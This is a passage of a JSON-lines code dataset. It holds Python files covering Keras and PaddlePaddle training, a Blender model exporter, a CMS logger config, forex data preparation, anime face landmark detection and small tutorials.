varName, None)\n fileDict = {}\n if var != None:\n fileDict[param] = var\n else:\n if input.namelist(namelist).exists(param):\n fileDict[param] = input.namelist(namelist).param(param, \\\n quotes = False)\n else:\n fileDict[param] = defaults[varName]\n\n\n def syncPathInNamelist(self, param, namelist, varName, input, defaults = None):\n \"\"\"\n Syncs path attribute in namelist with setting variable varName\n \"\"\"\n var = getattr(self, varName, None)\n if var != None:\n input.namelist(namelist).add(param, var, quotes = True)\n setattr(self._paths, varName, var)\n else:\n if input.namelist(namelist).exists(param):\n inputVar = input.namelist(namelist).param(param, quotes = False)\n setattr(self._paths, varName, inputVar)\n else:\n setattr(self._paths, varName, defaults[varName])","sub_path":"espresso/tags/qecalc-0.2.2/qecalc/qetask/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"20701008","text":"from __future__ import print_function\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution3D, MaxPooling3D\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\n# input: 100x100 images with 3 channels -> (3, 100, 100) tensors.\n# this applies 32 convolution filters of size 3x3 each.\nmodel.add(Convolution3D(32, 3, 3, 3, border_mode='valid', input_shape=(None, 20, 50, 50)))\nmodel.add(Activation('relu'))\nmodel.add(Convolution3D(32, 3, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Convolution3D(64, 3, 3, 3, border_mode='valid'))\nmodel.add(Activation('relu'))\nmodel.add(Convolution3D(64, 3, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\n# Note: Keras does automatic shape inference.\nmodel.add(Dense(256))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10))\nmodel.add(Activation('softmax'))\n\nsgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd)\n\nX_train = np.load('../images.npy')\nY_train = np.load('../labels.npy')\n\nmodel.fit(X_train, Y_train, batch_size=2, nb_epoch=1)\n","sub_path":"DataScienceBowl/scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324484281","text":"# vim:ts=4:et\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom mathutils import Vector, Quaternion\n\nfrom .. import properties\nfrom ..mu import Mu\nfrom ..mu import MuObject, MuTransform, MuTagLayer\nfrom ..utils import strip_nnn\n\nfrom .animation import collect_animations, find_path_root, make_animations\nfrom .collider import make_collider\nfrom .cfgfile import generate_cfg\nfrom .volume import model_volume\n\ndef make_transform(obj):\n transform = MuTransform()\n transform.name = strip_nnn(obj.name)\n transform.localPosition = Vector(obj.location)\n if obj.rotation_mode != 'QUATERNION':\n transform.localRotation = obj.rotation_euler.to_quaternion()\n else:\n transform.localRotation = Quaternion(obj.rotation_quaternion)\n transform.localScale = Vector(obj.scale)\n return transform\n\ndef make_tag_and_layer(obj):\n tl = MuTagLayer()\n tl.tag = obj.muproperties.tag\n tl.layer = obj.muproperties.layer\n return tl\n\ntype_handlers = {} # filled in by the modules that handle the obj.data types\nexported_objects = set()\n\ndef is_collider(obj):\n muprops = obj.muproperties\n if muprops.collider and muprops.collider != 'MU_COL_NONE':\n return True\n return False\n\ndef find_single_collider(objects):\n colliders = []\n for o in objects:\n if is_collider(o):\n colliders.append(o)\n if len(colliders) == 1:\n mat = colliders[0].matrix_local\n if mat == mat.Identity(4):\n return colliders[0]\n return None\n\ndef make_obj_core(mu, obj, path, muobj):\n if path:\n path += \"/\"\n path += muobj.transform.name\n mu.object_paths[path] = muobj\n muobj.tag_and_layer = make_tag_and_layer(obj)\n if is_collider(obj):\n exported_objects.add(obj)\n muobj.collider = make_collider(mu, obj)\n return muobj\n elif type(obj.data) in type_handlers:\n mu.path = path #needs to be reset as a type handler might modify it\n muobj = type_handlers[type(obj.data)](obj, muobj, mu)\n if not muobj:\n # the handler decided the object should not be exported\n return None\n exported_objects.add(obj)\n col = find_single_collider(obj.children)\n if col:\n exported_objects.add(col)\n muobj.collider = make_collider(mu, col)\n for o in obj.children:\n if o in exported_objects:\n # the object has already been exported\n continue\n muprops = o.muproperties\n #check whether the object should be exported (eg, props should not be\n #exported as part of an IVA, and IVAs should not be exported as part\n #of a part (that sounds odd)\n if muprops.modelType in mu.special:\n if mu.special[muprops.modelType](mu, o):\n continue\n child = make_obj(mu, o, path)\n if child:\n muobj.children.append(child)\n return muobj\n\ndef make_obj(mu, obj, path):\n if obj in exported_objects:\n # the object has already been \"exported\"\n return None\n muobj = MuObject()\n muobj.transform = make_transform (obj)\n return make_obj_core(mu, obj, path, muobj)\n\ndef add_internal(mu, obj):\n if not mu.internal:\n mu.internal = obj\n return True\n\ndef add_prop(mu, obj):\n mu.props.append(obj)\n return True\n\nspecial_modelTypes = {\n 'NONE': {},\n 'PART': {'INTERNAL':add_internal},\n 'PROP': {},\n 'INTERNAL': {'PROP':add_prop},\n}\n\ndef export_object(obj, filepath):\n exported_objects.clear()\n animations = collect_animations(obj)\n anim_root = find_path_root(animations)\n mu = Mu()\n mu.name = strip_nnn(obj.name)\n mu.object_paths = {}\n mu.materials = {}\n mu.textures = {}\n mu.nodes = []\n mu.props = []\n mu.messages = []\n mu.internal = None\n mu.type = obj.muproperties.modelType\n mu.CoMOffset = None\n mu.CoPOffset = None\n mu.CoLOffset = None\n mu.inverse = obj.matrix_world.inverted()\n mu.special = special_modelTypes[mu.type]\n mu.obj = make_obj(mu, obj, \"\")\n mu.materials = list(mu.materials.values())\n mu.materials.sort(key=lambda x: x.index)\n mu.textures = list(mu.textures.values())\n mu.textures.sort(key=lambda x: x.index)\n if anim_root and anim_root in mu.object_paths:\n anim_root_obj = mu.object_paths[anim_root]\n anim_root_obj.animation = make_animations(mu, animations, anim_root)\n mu.write(filepath)\n mu.skin_volume, mu.ext_volume = model_volume(obj)\n generate_cfg(mu, filepath)\n return mu\n","sub_path":"All_In_One/addons/io_object_mu/export_mu/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425339717","text":"# Free test configuration file for MessageLogger service:\n# Behavior implied by S. Naumann but unexpected on our part.\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\n\nimport FWCore.Framework.test.cmsExceptionsFatal_cff\nprocess.options = FWCore.Framework.test.cmsExceptionsFatal_cff.options\n\nprocess.load(\"FWCore.MessageService.test.Services_cff\")\n\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n default = cms.untracked.PSet( limit = cms.untracked.int32( 0)\n),\n expect_specific = cms.untracked.PSet( limit = cms.untracked.int32(-1)\n),\n)\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(2)\n)\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.sendSomeMessages = cms.EDAnalyzer( \"UnitTestClient_E\")\n\nprocess.p = cms.Path(process.sendSomeMessages)\n","sub_path":"FWCore/MessageService/test/t1_cfg.py","file_name":"t1_cfg.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"224066157","text":"import random\n\ndef rnd():\n\treturn (random.randint(10, 25))\n\nschool = { \"1a\": rnd(), \"1b\": rnd(), \"2a\": rnd(), \"2b\": rnd(), \"3a\": rnd(),\n\t\t\t\"3b\": rnd(), \"4a\": rnd(), \"4b\": rnd(), \"5a\": rnd(), \"5b\": rnd() }\n\nprint (school[\"1a\"], \" children in 1a class\")\n\ndel(school[\"1a\"])\n\nschool[\"2a\"] = rnd()\nschool[\"3a\"] = rnd()\nschool[\"4a\"] = rnd()\n\nschool[\"6a\"] = rnd()\nschool[\"6b\"] = rnd()\n\nprint (school)\n","sub_path":"lab21.py","file_name":"lab21.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494717574","text":"import numpy as np\n\n\n# sigmoid function\ndef nonlin(x, deriv=False):\n if deriv:\n return x * (1 - x) # formula for derivative of output of sigmoid\n return 1 / (1 + np.exp(-x))\n\n\n##############################\n# 2 Layer Neural Network\n##############################\ndef two_layer_nn():\n # input dataset\n X = np.array([[0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]\n ])\n\n # outputs (original)\n y = np.array([[0, 0, 1, 1]]).T # transpose to make it a row vector\n\n # seed random values to get decent same results every time\n np.random.seed(1)\n\n # initialize weights randomly\n syn0 = 2 * np.random.random((3, 1)) - 1\n\n for i in range(10):\n # forward propagation\n l0 = X\n l1 = nonlin(np.dot(X, syn0)) # make the prediction of output\n\n # Loss estimation\n l1_error = y - l1 # calculate error, your loss function\n\n # gradient descent\n l1_delta = l1_error * nonlin(l1, True) # multiplying element-wise\n\n # update weights\n syn0 += np.dot(l0.T, l1_delta)\n\n if i % 1 == 0:\n print(f\"iteration {i}: \\nOutput {l1}\")\n\n # print(\"Output After Training\")\n # print(l1)\n\n\n##############################\n# 3 Layer Neural Network\n##############################\ndef three_layer_nn():\n # inputs\n X = np.array([\n [0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]])\n\n # outputs\n # y = np.array([[0, 1, 1, 0]]).T\n y = np.array([[0], [1], [1], [0]])\n\n # set random seed and initialize weights\n np.random.seed(1)\n\n # weights of two different layers\n # randomly initialize with mean 0\n syn0 = 2 * np.random.random((3, 4)) - 1\n syn1 = 2 * np.random.random((4, 1)) - 1\n\n for i in range(60000):\n # feed forward\n l0 = X\n # l1 = nonlin(np.dot(X, syn0))\n l1 = nonlin(np.dot(l0, syn0))\n l2 = nonlin(np.dot(l1, syn1))\n\n # calculate error\n out_error = y - l2\n\n #############################################\n # MY METHOD\n #############################################\n # wrong back propagate\n # error_deriv = nonlin(out_error, deriv=True)\n # l0_error = l1 * error_deriv\n # l1_error = l2 * error_deriv\n\n # update weights\n # syn0 += np.dot(l0.T, l0_error)\n # syn1 += np.dot(l1.T, l1_error)\n\n #############################################\n # Reference Method\n #############################################\n l2_delta = out_error * nonlin(l2, True)\n\n # how much each value contributes to error\n # back propagation\n l1_error = l2_delta.dot(syn1.T)\n\n # now go for first layer eror\n l1_delta = l1_error * nonlin(l1, True)\n\n syn1 += l1.T.dot(l2_delta)\n syn0 += l0.T.dot(l1_delta)\n\n print(\"Output After Training\")\n print(l2)\n\n\ntwo_layer_nn()\n# three_layer_nn()\n","sub_path":"part1/x_neuralnetwork.py","file_name":"x_neuralnetwork.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"19901161","text":"import numpy\nimport os\nimport csv\nfrom pandas import read_csv\nfrom datetime import datetime, timedelta\nfrom pandas import DatetimeIndex, to_datetime\nimport time\nfrom subprocess import call\nimport re\nimport datetime\nimport windowCreator\nfrom random import shuffle\nimport Logger\n\n############################################\n\nCOMPRESSED_HISTORY_FILE = 'D:\\\\dukascopy_history\\\\EURUSD-2016_01_01-2017_08_14.csv.npz'\nRESULT_FILE = 'C:\\\\dukascopy_input\\\\EURUSD-2016_01_01-2017_08_14-evaluation'\nNUMBER_OF_VALIDATION_DAYS = 21 # average number of work days in month\n#NUMBER_OF_VALIDATION_DAYS = 1\n\n############################################\n\ndef loadCompressedHistory():\n loggerToken = Logger.phaseLogStart('Loading compressed history')\n\n history = numpy.load(COMPRESSED_HISTORY_FILE)['arr_0']\n\n enumeratedHistoryFeatures = ['timestamp', 'month', 'dayOfMonth', 'dayOfWeek', 'timeOfDay', 'ask', 'bid', 'askVolume', 'bidVolume']\n\n Logger.phaseLogEnd(loggerToken)\n\n return history, enumeratedHistoryFeatures\n\ndef trimHistoryToEvaluationDaysOnly(history):\n loggerToken = Logger.phaseLogStart('Trimming history')\n\n trainDays = history[-NUMBER_OF_VALIDATION_DAYS :]\n\n Logger.phaseLogEnd(loggerToken)\n\n return trainDays\n\ndef prepareEvaluationHistory():\n history, enumeratedHistoryFeatures = loadCompressedHistory()\n\n history = trimHistoryToEvaluationDaysOnly(history)\n\n return numpy.array(history.tolist()), enumeratedHistoryFeatures\n\n#def extractWindows(history):\n# loggerToken = Logger.phaseLogStart('Extracting windows')\n\n# allWindows = []\n\n# for historyDay in history:\n# index = 0\n\n# while True:\n# window = windowCreator.createWindow(historyDay, index)\n\n# if window is None:\n# break;\n\n# print(window[1])\n\n# index = index + 1\n\n# allWindows.append(window)\n\n# Logger.phaseLogEnd(loggerToken)\n\n# return numpy.array(allWindows)\n\ndef extractWindows(history, enumeratedHistoryFeatures):\n loggerToken = Logger.phaseLogStart('Extracting windows')\n\n features = ['ask', 'bid']\n\n allowedOverlap = 0 # no overlap\n\n windowWidth = 30 * 60 * 1000 # 30 minutes\n\n predictionRange = 5 * 1000 # 5 seconds\n\n allWindows = windowCreator.createWindows(history, enumeratedHistoryFeatures, allowedOverlap, features, windowWidth, predictionRange)\n\n Logger.phaseLogEnd(loggerToken)\n \n return allWindows\n\ndef storeResult(windows):\n loggerToken = Logger.phaseLogStart('Storing result on disk')\n\n numpy.save(RESULT_FILE, windows)\n\n Logger.phaseLogEnd(loggerToken)\n\n############################################\n\nloggerToken = Logger.phaseLogStart('Preparing evaluation input')\n\nhistory, enumeratedHistoryFeatures = prepareEvaluationHistory()\n\nevaluationWindows = extractWindows(history, enumeratedHistoryFeatures)\n\nstoreResult(evaluationWindows)\n\nLogger.phaseLogEnd(loggerToken)\n","sub_path":"dukascopy/EvaluationInputCreator.py","file_name":"EvaluationInputCreator.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"1743602","text":"import numpy as np\nimport torch\nfrom torchvision import transforms\nimport cv2\nfrom PIL import Image, ImageDraw\nfrom CFA import CFA\n\nclass Landmark():\n\n # コンストラクタ\n def __init__(self, input_file):\n input_img_name = input_file\n self.num_landmark = 24\n self.img_width = 128\n checkpoint_name = 'checkpoint_landmark_191116.pth.tar'\n\n face_detector = cv2.CascadeClassifier('lbpcascade_animeface.xml')\n landmark_detector = CFA(output_channel_num=self.num_landmark + 1, checkpoint_name=checkpoint_name).cpu()\n\n normalize = transforms.Normalize(mean=[0.5, 0.5, 0.5],std=[0.5, 0.5, 0.5])\n train_transform = [transforms.ToTensor(), normalize]\n train_transform = transforms.Compose(train_transform)\n\n img = cv2.imread(input_img_name)\n faces = face_detector.detectMultiScale(img)\n img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n draw = ImageDraw.Draw(img)\n\n for x_, y_, w_, h_ in faces:\n\n # 顔のサイズを調整\n self.x = max(x_ - w_ / 8, 0)\n rx = min(x_ + w_ * 9 / 8, img.width)\n self.y = max(y_ - h_ / 4, 0)\n by = y_ + h_\n self.w = rx - self.x\n self.h = by - self.y\n\n\n # 画像変換\n img_tmp = img.crop((self.x, self.y, self.x+self.w, self.y+self.h))\n img_tmp = img_tmp.resize((self.img_width, self.img_width), Image.BICUBIC)\n img_tmp = train_transform(img_tmp)\n img_tmp = img_tmp.unsqueeze(0).cpu()\n\n # ヒートマップを推定\n self.heatmaps = landmark_detector(img_tmp)\n self.heatmaps = self.heatmaps[-1].cpu().detach().numpy()[0]\n\n def get_landmark(self, key):\n res = np.empty((0, 2))\n for i in range(self.num_landmark):\n heatmaps_tmp = cv2.resize(self.heatmaps[i], (self.img_width, self.img_width), interpolation=cv2.INTER_CUBIC)\n landmark = np.unravel_index(np.argmax(heatmaps_tmp), heatmaps_tmp.shape)\n landmark_y = landmark[0] * self.h / self.img_width\n landmark_x = landmark[1] * self.w / self.img_width\n\n if key == \"right_eye\" and (i == 10 or i == 11 or i == 12 or i == 13 or i == 14):\n res = np.append(res, [[self.x + landmark_x, self.y + landmark_y]], axis = 0)\n\n if key == \"left_eye\" and (i == 15 or i == 16 or i == 17 or i == 18 or i == 19):\n res = np.append(res, [[self.x + landmark_x, self.y + landmark_y]], axis = 0)\n \n\n #顔パーツ(右目、左目、口、顔、前髪、鼻)の座標を取得\n if i == 0:\n r_ear_rx,r_ear_ry = landmark_x,landmark_y\n elif i == 2:\n l_ear_lx,l_ear_ly = landmark_x,landmark_y\n elif i == 9:\n nose_x, nose_y = landmark_x, landmark_y\n elif i == 10:\n r_eye_rx,r_eye_ry = landmark_x,landmark_y\n elif i == 11:\n r_eye_ux,r_eye_uy = landmark_x,landmark_y\n elif i == 12:\n r_eye_lx,r_eye_ly = landmark_x,landmark_y\n elif i == 13:\n r_eye_dx,r_eye_dy = landmark_x,landmark_y\n elif i == 15:\n l_eye_rx,l_eye_ry = landmark_x,landmark_y\n elif i == 16:\n l_eye_ux,l_eye_uy = landmark_x,landmark_y\n elif i == 17:\n l_eye_lx,l_eye_ly = landmark_x,landmark_y\n elif i == 18:\n l_eye_dx,l_eye_dy = landmark_x,landmark_y\n elif i == 20:\n mouth_rx,mouth_ry = landmark_x,landmark_y\n elif i == 21:\n mouth_ux,mouth_uy = landmark_x,landmark_y\n elif i == 22:\n mouth_lx,mouth_ly = landmark_x,landmark_y\n elif i == 23:\n mouth_dx,mouth_dy = landmark_x,landmark_y\n\n res = res.astype('int64')\n\n # 認識する顔パーツの長方形座標\n if key == \"right_eye\":#右目を認識して矩形を自動で作成する\n rect = (int(self.x + r_eye_rx - 15) , int(self.y + r_eye_uy - 8),int(self.x + r_eye_lx + 8),int(self.y + r_eye_dy + 5))\n elif key == \"left_eye\":#左目を認識\n rect = (int(self.x + l_eye_rx - 8) , int(self.y + l_eye_uy - 8),int(self.x + l_eye_lx + 15),int(self.y + l_eye_dy + 5))\n elif key == \"mouth\":#口\n rect = (int(self.x + mouth_rx - 8), int(self.y + mouth_uy - 8),int(self.x + mouth_lx + 8),int(self.y + mouth_dy + 5))\n elif key == \"face\":#顔\n rect = (int(self.x),int(self.y),int(self.x + self.w),int(self.y + self.h))\n elif key == \"bangs\":#前髪\n rect = (int(self.x),int(self.y),int(self.x + self.w),int(self.y + self.h/2 + 20))\n elif key == \"nose\":#鼻\n rect =(int(self.x + nose_x - 10),int(self.y + nose_y + 10),int(self.x + nose_x + 10),int(self.y + nose_y - 10))\n \n\n return res, rect\n","sub_path":"landmark.py","file_name":"landmark.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"352486363","text":"from mdp.action.gym_action import GymAction, RewardCalculator\nfrom mdp.policy.greedy_policy import GreedyPolicy\n\n\nclass NStepAction(GymAction):\n def __init__(self, discount_factor, gym_value, **kwargs):\n super().__init__(discount_factor, gym_value, **kwargs)\n\n def update(self, reward_calculator, next_actions, **kwargs):\n time_step = kwargs['time_step']\n evaluated_action_value = 0\n if next_actions:\n next_action = GreedyPolicy().pick_action(next_actions)\n evaluated_action_value = next_action.evaluate()\n reward_calculator = self.reward_calculators[time_step]\n g = reward_calculator.get_reward() + reward_calculator.get_next_discount() * evaluated_action_value\n self.learn(g)\n del self.reward_calculators[time_step]\n\n def cache_reward(self, reward, step=9e20):\n for rc in self.reward_calculators.values():\n rc.cache_reward(reward, step)\n\n","sub_path":"src/mdp/action/n_step_action.py","file_name":"n_step_action.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309738232","text":"# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os\nimport time\nimport numpy as np\nimport logging\nimport commands\nimport re\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.incubate.fleet.base.role_maker as role_maker\nfrom paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet\nfrom paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig\nimport py_reader_generator as py_reader\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(\"fluid\")\nlogger.setLevel(logging.INFO)\n\n\nclass FleetRunnerBase(object):\n \"\"\"\n Distribute training base class:\n This class abstracts the training process into several major steps:\n 1. input_data\n 2. net\n 3. run_pserver\n 4. run_dataset_trainer\n 5. run_pyreader_trainer\n 6. run_infer\n 7. py_reader\n 8. dataset_reader\n 9. runtime_main\n ...\n \"\"\"\n\n def input_data(self, params):\n \"\"\"\n Function input_data: Definition of input data format in the network\n Args:\n :params: the hyper parameters of network\n Returns:\n defined by users\n \"\"\"\n raise NotImplementedError(\n \"input_data should be implemented by child classes.\")\n\n def net(self, inputs, params):\n \"\"\"\n Function net: Definition of network structure\n Args:\n :inputs: input data, eg: dataset and labels. defined by funtion: self.input_data\n :params: the hyper parameters of network\n Returns:\n evaluation parameter, defined by users\n \"\"\"\n raise NotImplementedError(\"net should be implemented by child classes.\")\n\n def run_pserver(self, params):\n \"\"\"\n Function run_pserver: Operation method of parameter server\n Args\n :params the hyper parameters of network\n Returns:\n None\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.SERVER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n reader = None\n inputs = self.input_data(params)\n if params.is_pyreader_train:\n reader = self.py_reader(params)\n inputs = fluid.layers.read_file(reader)\n elif not params.is_dataset_train:\n raise ValueError(\"Program must has Date feed method: is_pyreader_train / is_dataset_train\")\n\n # step3: define the network\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n fleet.init_server()\n logger.info(\"PServer init success!\")\n fleet.run_server()\n\n def run_dataset_trainer(self, params):\n \"\"\"\n Function run_trainer: Operation method of dataset training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :train_result: the dict of training log\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.WORKER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n inputs = self.input_data(params)\n\n # step3: define the network, same with PSERVER\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n # step5: define Executor and run startup program\n exe = fluid.Executor(fluid.CPUPlace())\n fleet.init_worker()\n # No need to exe.run(fluid.default_main_program())\n exe.run(fleet.startup_program)\n\n # step6: init dataset reader\n # Notice: Both dataset and py_reader method don't using feed={dict} to input data\n # Paddle Fluid get data by variable name\n # When we do the definition of the reader, the program has established the workflow\n dataset = self.dataset_reader(inputs, params)\n file_list = [\n str(params.train_files_path) + \"/%s\" % x\n for x in os.listdir(params.train_files_path)]\n if params.is_local_cluster:\n file_list = fleet.split_files(file_list)\n logger.info(\"file list: {}\".format(file_list))\n logger.info('----------------------NO.%s trainer ready----------------' % (params.current_id))\n\n # step7: begin to train your model, good luck\n train_result = {}\n for epoch in range(params.epochs):\n dataset.set_filelist(file_list)\n start_time = time.clock()\n\n # Notice: function train_from_dataset does not return fetch value\n exe.train_from_dataset(\n program=fleet.main_program,\n dataset=dataset,\n fetch_list=[auc_var],\n fetch_info=['auc'],\n print_period=10,\n debug=False)\n end_time = time.clock()\n self.record_time(epoch, train_result, end_time - start_time)\n self.record_memory(epoch, train_result)\n logger.info(\"epoch %d finished, use time=%d\\n\" % ((epoch), end_time - start_time))\n if params.is_first_trainer:\n model_path = str(params.model_path) + '/trainer_' + str(params.current_id) + '_epoch_' + str(epoch)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n if params.is_first_trainer:\n train_method = '_dataset_train'\n model_path = str(params.model_path + '/final' + train_method)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n logger.info(\"Train Success!\")\n fleet.stop_worker()\n return train_result\n\n def run_pyreader_trainer(self, params):\n \"\"\"\n Function run_trainer: Operation method of py_reader training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :train_result: the dict of training log\n \"\"\"\n # step1: define the role of node, configure communication parameter\n role = role_maker.UserDefinedRoleMaker(\n current_id=params.current_id,\n role=role_maker.Role.WORKER,\n worker_num=params.trainers,\n server_endpoints=params.pserver_endpoints)\n fleet.init(role)\n\n # step2: define the input data of network\n inputs = self.input_data(params)\n reader = self.py_reader(params)\n inputs = fluid.layers.read_file(reader)\n\n # step3: define the network, same with PSERVER\n # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network\n # Replace it with your network evaluation index,\n loss, auc_var, batch_auc_var = self.net(inputs, params)\n\n # step4: define the optimizer for your model\n # define the optimizer for your model\n optimizer = fluid.optimizer.Adam(params.learning_rate)\n optimizer = fleet.distributed_optimizer(optimizer, self.strategy)\n optimizer.minimize(loss)\n\n # step5: define Executor and run startup program\n exe = fluid.Executor(fluid.CPUPlace())\n fleet.init_worker()\n # No need to exe.run(fluid.default_main_program())\n exe.run(fleet.startup_program)\n\n # step6: init py_reader reader\n # Notice: Both dataset and py_reader method don't using feed={dict} to input data\n # Paddle Fluid get data by variable name\n # When we do the definition of the reader, the program has established the workflow\n train_generator = py_reader.CriteoDataset(params.sparse_feature_dim)\n file_list = [\n str(params.train_files_path) + \"/%s\" % x\n for x in os.listdir(params.train_files_path)]\n if params.is_local_cluster:\n file_list = fleet.split_files(file_list)\n logger.info(\"file list: {}\".format(file_list))\n train_reader = paddle.batch(\n paddle.reader.shuffle(\n train_generator.train(file_list, params.trainers,\n params.current_id),\n buf_size=params.batch_size * 100),\n batch_size=params.batch_size)\n reader.decorate_paddle_reader(train_reader)\n\n # step7: define the compiled program\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.num_threads = int(params.cpu_num)\n build_strategy = fluid.BuildStrategy()\n build_strategy.async_mode = self.async_mode\n if params.sync_mode == 'async':\n build_strategy.memory_optimize = False\n if int(params.cpu_num) > 1:\n build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce\n compiled_prog = fluid.compiler.CompiledProgram(\n fleet.main_program).with_data_parallel(\n loss_name=loss.name,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy)\n logger.info('----------------------NO.%s trainer ready----------------' % (params.current_id))\n\n # step8: begin to train your model, good luck\n train_result = {}\n for epoch in range(params.epochs):\n # Notice: py_reader should use try & catch EOFException method to enter the dataset\n # reader.start() must declare in advance\n reader.start()\n start_time = time.clock()\n batch_id = 0\n try:\n while True:\n loss_val, auc_val, batch_auc_val = exe.run(\n program=compiled_prog,\n fetch_list=[\n loss.name, auc_var.name, batch_auc_var.name\n ])\n loss_val = np.mean(loss_val)\n auc_val = np.mean(auc_val)\n batch_auc_val = np.mean(batch_auc_val)\n if batch_id % 10 == 0 and batch_id != 0:\n logger.info(\n \"TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}\"\n .format(epoch, batch_id, loss_val / params.\n batch_size, auc_val, batch_auc_val))\n batch_id += 1\n except fluid.core.EOFException:\n reader.reset()\n\n end_time = time.clock()\n train_result = self.record_time(epoch, train_result, end_time - start_time)\n train_result = self.record_memory(epoch, train_result)\n logger.info(\"epoch %d finished, use time=%d\\n\" % ((epoch), end_time - start_time))\n if params.is_first_trainer:\n model_path = str(params.model_path) + '/trainer_' + str(params.current_id) + '_epoch_' + str(epoch)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n if params.is_first_trainer:\n train_method = '_pyreader_train'\n model_path = str(params.model_path + '/final' + train_method)\n fleet.save_persistables(executor=exe, dirname=model_path)\n\n logger.info(\"Train Success!\")\n fleet.stop_worker()\n return train_result\n\n 